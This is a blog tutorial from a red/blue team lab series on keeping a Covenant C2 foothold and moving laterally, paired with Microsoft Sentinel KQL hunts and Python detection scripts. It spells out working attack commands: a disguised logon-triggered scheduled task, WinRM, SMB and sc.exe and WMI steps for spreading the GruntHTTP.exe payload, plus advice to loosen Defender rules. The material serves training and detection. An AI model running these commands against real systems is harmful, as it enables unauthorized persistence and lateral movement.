In Part 2 of this series, we established a Covenant C2 connection by launching a Grunt on the victim system (test001) under user John. Now that the Grunt session is live, what happens next?
In this post, we’ll explore the immediate blue team detection, the attacker’s essential persistence and lateral movement steps, and how to hunt for these activities using Microsoft Sentinel.
We’ll keep things simple and follow the lab story:
- The attacker operates from Commando VM
- The victim is test001, logged in as John
- The tools used are familiar Microsoft Defender and Sentinel capabilities
Let’s go.
Detecting the Covenant Grunt (Blue Team Perspective)
Once the Covenant Grunt connects, Microsoft Defender for Endpoint may raise alerts such as:
- Suspicious .NET command execution
- Unusual outbound HTTP connections
- Possible command-and-control behavior
In the Microsoft 365 Defender portal, this might show up as:
- An alert tied to test001
- The user John
- A process like GruntHTTP.exe, powershell.exe, or rundll32.exe
Security teams would see the alert, drill into the timeline, and see the entire sequence of events: who ran what, when, and what network connections occurred.
If you’re monitoring these endpoints, keep an eye out for:
- Executable file launches from temp or user folders
- Encoded or obfuscated PowerShell
- Outbound HTTP connections to addresses that are unusual for the host (in this lab, the Covenant listener on Commando VM) or on uncommon ports
Tip: If you’re testing this in your lab with Defender enabled, the payload will likely be quarantined on arrival. Put the relevant ASR rules in audit mode or add a path exclusion for your payload folder so the exercise can continue, and note that you did: an exclusion on a user-writable folder is exactly the gap a real attacker hopes to find.
Maintaining Access: Persistence via Scheduled Task
You don’t want to lose the Grunt if the victim logs off or reboots. You need persistence.
One of the easiest (and noisiest) ways is to create a scheduled task.
From your Grunt on test001, you can run:
schtasks /create /sc onlogon /tn "OneDrive Update" /tr "C:\Users\John\AppData\Local\Temp\update.bat" /f
This:
- Runs every time John logs in (the onlogon trigger)
- Launches update.bat, which contains your Covenant launcher or callback logic
- Runs in John’s own context and needs no admin rights, because without /ru the task belongs to the user who created it
- Uses a name that blends in with legitimate vendor tasks
To verify:
schtasks /query /tn "OneDrive Update" /fo LIST /v
This is great from a red team perspective — you’ll re-establish access the next time John logs in.
How Blue Team Sees It:
When this task is created:
- A Windows Security Event ID 4698 (A scheduled task was created) is written, but only if the Other Object Access Events audit subcategory is enabled. It is off by default, so turn it on in the lab or you will be hunting for an event that was never logged
- Defender for Endpoint records a ScheduledTaskCreated action in its DeviceEvents data, with the task details in AdditionalFields
- Both are tied to the user John and the device test001
Defenders reviewing logs or using KQL in Microsoft Sentinel can spot this easily (we’ll do that later).
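The 4698 event does not hand you the command on a plate: the task definition arrives as an XML blob (the TaskContent column in Sentinel), and the interesting bits, the action, the trigger and the run level, are inside it. The following is an added example, not code from the original post, that parses that XML and flags tasks shaped like the one created above. The two 4698 records at the bottom are constructed for the example, and the list of vendor-lookalike names is an assumption you would tune to your own environment.

```python
"""
Added example, not code from the original post: parse the task XML that
Security event 4698 carries (the TaskContent column in Sentinel's
SecurityEvent table) and flag tasks that look like the "OneDrive Update"
persistence above. The two event records at the bottom are constructed for
this example; the field names follow the SecurityEvent columns.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Folders a standard user can write to. A logon-triggered task whose action
# lives here deserves a look; one under Program Files usually does not.
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|Users\\Public|Downloads|ProgramData)\\", re.I)

# Task names that borrow a well-known vendor name (assumed list; tune per environment).
VENDOR_LOOKALIKE = re.compile(r"onedrive|windows update|adobe|google", re.I)

SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta")


def parse_task_content(xml_text):
    """Pull the command, arguments, trigger types and run level out of 4698 TaskContent."""
    # Sentinel stores the task definition with its <?xml ...?> declaration; drop
    # it so the string parses regardless of the declared encoding.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)
    exec_node = root.find(".//t:Actions/t:Exec", TASK_NS)
    command = arguments = ""
    if exec_node is not None:
        command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS)
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS)
    triggers_node = root.find("t:Triggers", TASK_NS)
    triggers = [] if triggers_node is None else [c.tag.split("}")[-1] for c in triggers_node]
    run_level = root.findtext(".//t:Principal/t:RunLevel", default="", namespaces=TASK_NS)
    return {"command": command, "arguments": arguments,
            "triggers": triggers, "run_level": run_level}


def assess_task_event(event):
    """Return the parsed task plus the reasons (if any) it looks like attacker persistence."""
    task = parse_task_content(event["TaskContent"])
    cmd = task["command"]
    reasons = []
    if USER_WRITABLE.search(cmd):
        reasons.append("action lives in a user-writable folder")
    if cmd.lower().endswith(SCRIPT_EXTENSIONS):
        reasons.append("action is a script rather than a signed binary")
    if {"LogonTrigger", "BootTrigger"} & set(task["triggers"]):
        reasons.append("logon/boot trigger, i.e. survives logoff or reboot")
    if VENDOR_LOOKALIKE.search(event["TaskName"]) and not re.search(r"\\Program Files", cmd, re.I):
        reasons.append("vendor-lookalike task name but action outside Program Files")
    return {"computer": event["Computer"], "account": event["Account"],
            "task": event["TaskName"], "command": (cmd + " " + task["arguments"]).strip(),
            "triggers": task["triggers"], "reasons": reasons}


def hunt_scheduled_tasks(events):
    """The offline equivalent of the 4698 hunt: only records with at least one reason."""
    return [r for r in (assess_task_event(e) for e in events) if r["reasons"]]


# Constructed 4698 records: the persistence task from the schtasks command above,
# and a benign vendor task for comparison. Real TaskContent is far longer.
SAMPLE_4698 = [
    {"Computer": "test001", "Account": "TESTLAB\\John", "TaskName": "\\OneDrive Update",
     "TaskContent": (
         '<?xml version="1.0" encoding="UTF-16"?>'
         '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
         '<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>'
         '<Principals><Principal id="Author"><UserId>TESTLAB\\John</UserId>'
         '<RunLevel>LeastPrivilege</RunLevel></Principal></Principals>'
         '<Actions Context="Author"><Exec>'
         '<Command>C:\\Users\\John\\AppData\\Local\\Temp\\update.bat</Command>'
         '</Exec></Actions></Task>')},
    {"Computer": "test001", "Account": "TESTLAB\\svc_deploy", "TaskName": "\\Vendor Agent Check",
     "TaskContent": (
         '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
         '<Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary>'
         '</CalendarTrigger></Triggers>'
         '<Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel>'
         '</Principal></Principals>'
         '<Actions Context="Author"><Exec><Command>C:\\Program Files\\Vendor\\agent.exe</Command>'
         '<Arguments>/check</Arguments></Exec></Actions></Task>')},
]

if __name__ == "__main__":
    for hit in hunt_scheduled_tasks(SAMPLE_4698):
        print(f'{hit["computer"]} {hit["account"]} created {hit["task"]} -> {hit["command"]}')
        for reason in hit["reasons"]:
            print("   -", reason)
```

Run against the two constructed records it reports only the OneDrive Update task, with four reasons: a user-writable path, a .bat action, a logon trigger, and a vendor-style name pointing outside Program Files. The benign vendor task passes clean. The same parsing is what you want behind a Sentinel analytics rule on 4698, since TaskContent is the only place the real command lives.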
Spreading Out: Simple Lateral Movement
Now that you have a foothold, let’s say you want to pivot to test002 — another machine in the network.
Option 1: PowerShell Remoting (WinRM)
If WinRM is enabled (it is by default on Windows Server, but not on Windows client editions) and John is a local admin or a member of Remote Management Users on test002:
Enter-PSSession -ComputerName test002 -Credential John
Or, to execute a quick command remotely:
Invoke-Command -ComputerName test002 -Credential John -ScriptBlock { hostname; whoami }
Passing -Credential John makes PowerShell prompt for a password, which only works from an interactive console. A Grunt’s PowerShell task has no console, so build the credential object first and stick to Invoke-Command:
$pw = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('TESTLAB\John', $pw)
Invoke-Command -ComputerName test002 -Credential $cred -ScriptBlock { hostname; whoami }
From here, you could drop a launcher and get a new Grunt from test002.
Option 2: SMB with Remote Service Execution
Both the C$ share and remote service creation require John to be a local administrator on test002.
Step 1 – Connect to the admin share:
net use \\test002\C$ /USER:TESTLAB\John <password>
Step 2 – Copy your payload:
copy GruntHTTP.exe \\test002\C$\Users\Public\GruntHTTP.exe
Step 3 – Remotely execute it via a service:
sc.exe \\test002 create "UpdateSvc" binPath= "C:\Users\Public\GruntHTTP.exe" start= demand
sc.exe \\test002 start "UpdateSvc"
The space after binPath= and start= is required by sc. Use sc.exe rather than sc if you run this from PowerShell, where sc is an alias for Set-Content. Because GruntHTTP.exe is not a real service binary, the start command will eventually report error 1053 and the Service Control Manager will kill the process when it fails to check in; the Grunt still runs for those seconds, so have the launcher hand off to a child process, or use the WMI route, which doesn’t go through the SCM at all.
Or via WMI:
wmic /node:test002 /user:TESTLAB\John /password:<password> process call create "C:\Users\Public\GruntHTTP.exe"
(Without /password, wmic prompts interactively, which a Grunt shell can’t answer. wmic is deprecated on current Windows builds; Invoke-CimMethod against the Win32_Process class is the PowerShell equivalent.)
Boom — you’ve moved laterally and potentially launched another Grunt.
What the Blue Team Sees:
On test002, the logs will show:
- 4624 (Security log): successful logon by John with logon type 3 (network); the IpAddress field carries test001’s address, and for NTLM the WorkstationName field carries its host name
- 4672 (Security log): special privileges assigned to the new logon, because John holds admin rights on test002
- 7045 (System log, not Security): a new service was installed, naming UpdateSvc and its image path C:\Users\Public\GruntHTTP.exe
The WMI route leaves no 7045, but it still produces the 4624 and a process creation under WmiPrvSE.exe that Defender for Endpoint records.
Defender for Endpoint might generate alerts like:
- Suspicious service creation
- Remote code execution attempt
- Lateral movement detected
These are all great hunting clues — and we’ll show how to use Sentinel next.
Hunting the Attack in Microsoft Sentinel
Assuming you have Microsoft Sentinel connected to Defender logs and Security Events, here’s how you can hunt for all of this.
Scheduled Task Creation (Persistence)
SecurityEvent
| where EventID == 4698
| where Computer == "test001"
| project TimeGenerated, Account, TaskName, TaskContent
You’ll see the task OneDrive Update created by John. The task’s full XML definition is in the TaskContent column; the <Command> element inside it is where update.bat shows up.
Lateral Movement via Logon Events
SecurityEvent
| where EventID == 4624 and LogonType == 3
| where Account contains "John"
| where Computer != "test001"
| project TimeGenerated, Computer, Account, IpAddress, WorkstationName, AuthenticationPackageName
This finds network logons by John on hosts other than test001, which is what both SMB and PowerShell Remoting to test002 generate. IpAddress (and, for NTLM, WorkstationName) points back at test001. Expect noise from legitimate file-share and management traffic; a useful twist is to start from a known-bad host and list every machine where its address appears as a logon source.
Service Creation Events (Remote Execution)
Event
| where EventLog == "System" and EventID == 7045
| where Computer == "test002"
| parse EventData with * 'ServiceName">' ServiceName '<' * 'ImagePath">' ImagePath '<' *
| project TimeGenerated, Computer, ServiceName, ImagePath
This catches the creation of the fake UpdateSvc service and its binary path. 7045 is a System log event, so it lands in the Event table (Windows Events connector with the System log enabled), not in SecurityEvent. It also doesn’t record who created the service or from where, so pair it with the 4624 type 3 logon that immediately precedes it on the same host.
Defender Alerts (Grunt Activity, Remote Access)
SecurityAlert
| where ProviderName == "MDATP"
| where CompromisedEntity in~ ("test001", "test002")
| project TimeGenerated, AlertName, AlertSeverity, CompromisedEntity, Tactics
Defender for Endpoint alerts arrive with ProviderName MDATP. The affected host is in CompromisedEntity, and the full host and user details are in the Entities JSON column.
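The logon and service-creation hunts above are two separate queries; the detection value comes from joining them: a remote network logon by a human account, followed within minutes by a service install on the same host. The following is an added example, not code from the original post, that runs that correlation offline over constructed records. Field names follow the SecurityEvent and Event columns used in the queries; every timestamp, address and event below is invented for the example, and the ten-minute window is an assumed tuning value.

```python
"""
Added example, not code from the original post: the lateral-movement hunt
above run offline, chaining a 4624 network logon (type 3) on a host other
than test001 to a 7045 service install that follows it on the same host.
Field names follow the SecurityEvent and Event columns used in the queries;
every record, timestamp and address below is constructed for the example.
"""
import re
from datetime import datetime, timedelta

USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|Users\\Public|Downloads|ProgramData)\\", re.I)
# Source addresses that mean "this host itself", not a remote peer.
LOCAL_SOURCES = {"-", "127.0.0.1", "::1"}


def _ts(event):
    return datetime.fromisoformat(event["TimeGenerated"])


def correlate_remote_service_installs(events, window=timedelta(minutes=10)):
    """Pair every 7045 with the latest preceding remote, human-account 4624 type-3 logon
    on the same computer inside `window`. Machine accounts (name ending in $) and
    loopback sources are ignored to cut the routine domain noise."""
    logons = [e for e in events
              if e["EventID"] == 4624 and e["LogonType"] == 3
              and not e["Account"].endswith("$")
              and e["IpAddress"] not in LOCAL_SOURCES]
    chains = []
    for svc in (e for e in events if e["EventID"] == 7045):
        candidates = [l for l in logons
                      if l["Computer"] == svc["Computer"]
                      and timedelta(0) <= _ts(svc) - _ts(l) <= window]
        if not candidates:
            continue
        logon = max(candidates, key=_ts)
        chains.append({
            "target": svc["Computer"],
            "account": logon["Account"],
            # NTLM logons fill WorkstationName with the client host; Kerberos often
            # leaves it blank, so fall back to the address.
            "source": logon["WorkstationName"] or logon["IpAddress"],
            "service": svc["ServiceName"],
            "image_path": svc["ImagePath"],
            "seconds_after_logon": int((_ts(svc) - _ts(logon)).total_seconds()),
            "severity": "high" if USER_WRITABLE.search(svc["ImagePath"]) else "medium",
        })
    return chains


# Constructed records. test002 shows the SMB + sc create path from above; test003
# shows a legitimate install with no remote logon behind it, plus an old logon
# by John that falls outside the correlation window.
EVENTS = [
    {"TimeGenerated": "2024-05-01T08:00:00", "Computer": "test003", "EventID": 4624,
     "Account": "TESTLAB\\John", "LogonType": 3, "IpAddress": "10.0.0.11", "WorkstationName": "TEST001"},
    {"TimeGenerated": "2024-05-01T10:02:10", "Computer": "test002", "EventID": 4624,
     "Account": "TESTLAB\\John", "LogonType": 3, "IpAddress": "10.0.0.11", "WorkstationName": "TEST001"},
    {"TimeGenerated": "2024-05-01T10:02:10", "Computer": "test002", "EventID": 4672,
     "Account": "TESTLAB\\John"},
    {"TimeGenerated": "2024-05-01T10:02:25", "Computer": "test002", "EventID": 7045,
     "ServiceName": "UpdateSvc", "ImagePath": "C:\\Users\\Public\\GruntHTTP.exe"},
    {"TimeGenerated": "2024-05-01T10:03:00", "Computer": "test002", "EventID": 4624,
     "Account": "TESTLAB\\DC01$", "LogonType": 3, "IpAddress": "10.0.0.5", "WorkstationName": ""},
    {"TimeGenerated": "2024-05-01T11:25:00", "Computer": "test003", "EventID": 4624,
     "Account": "TESTLAB\\Alice", "LogonType": 2, "IpAddress": "-", "WorkstationName": "TEST003"},
    {"TimeGenerated": "2024-05-01T11:30:00", "Computer": "test003", "EventID": 7045,
     "ServiceName": "MozillaMaintenance",
     "ImagePath": "C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe"},
]

if __name__ == "__main__":
    for c in correlate_remote_service_installs(EVENTS):
        print(f'[{c["severity"]}] {c["account"]} from {c["source"]} installed {c["service"]} '
              f'({c["image_path"]}) on {c["target"]} {c["seconds_after_logon"]}s after logging on')
```

On the constructed data the only chain reported is John, from TEST001, installing UpdateSvc on test002 fifteen seconds after a network logon, rated high because the image path is under Users\Public. The domain controller’s machine-account logon, the interactive logon on test003 and the stale morning logon all drop out, which is the filtering you would also want in the Sentinel rule so it doesn’t page on every software rollout.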
Look here for signs like:
- Unusual PowerShell execution
- C2 communication
- Credential dumping
- Lateral movement detections
Defender groups related alerts into a single Incident, and when Sentinel is connected to Microsoft 365 Defender that incident and its alerts are synchronized into Sentinel, so the scheduled task, the remote logons and the service creation end up in one case rather than four separate findings.
Recap
Here’s what we did in this lab cycle:
- Got a Covenant Grunt running on test001
- Maintained persistence with a scheduled task
- Used WinRM and SMB to move laterally to test002
- Showed how the Blue Team can detect all of it using Defender and Sentinel
You’ve now simulated an entire mini-attack lifecycle in your lab — initial access, persistence, lateral movement, and detection. That’s serious red + blue team growth.
Part of a Bigger Journey
This blog series supports the complete training guide:
Red Teaming and Blue Teaming with Microsoft Defender XDR
It’s packed with hands-on examples for IT pros learning to think like attackers and defenders.
Stick with us—next, we’ll discuss credential access, using tools like Mimikatz, and how to catch attackers before they make their move.
Let me know when you’re ready for Part 4!
John Sr.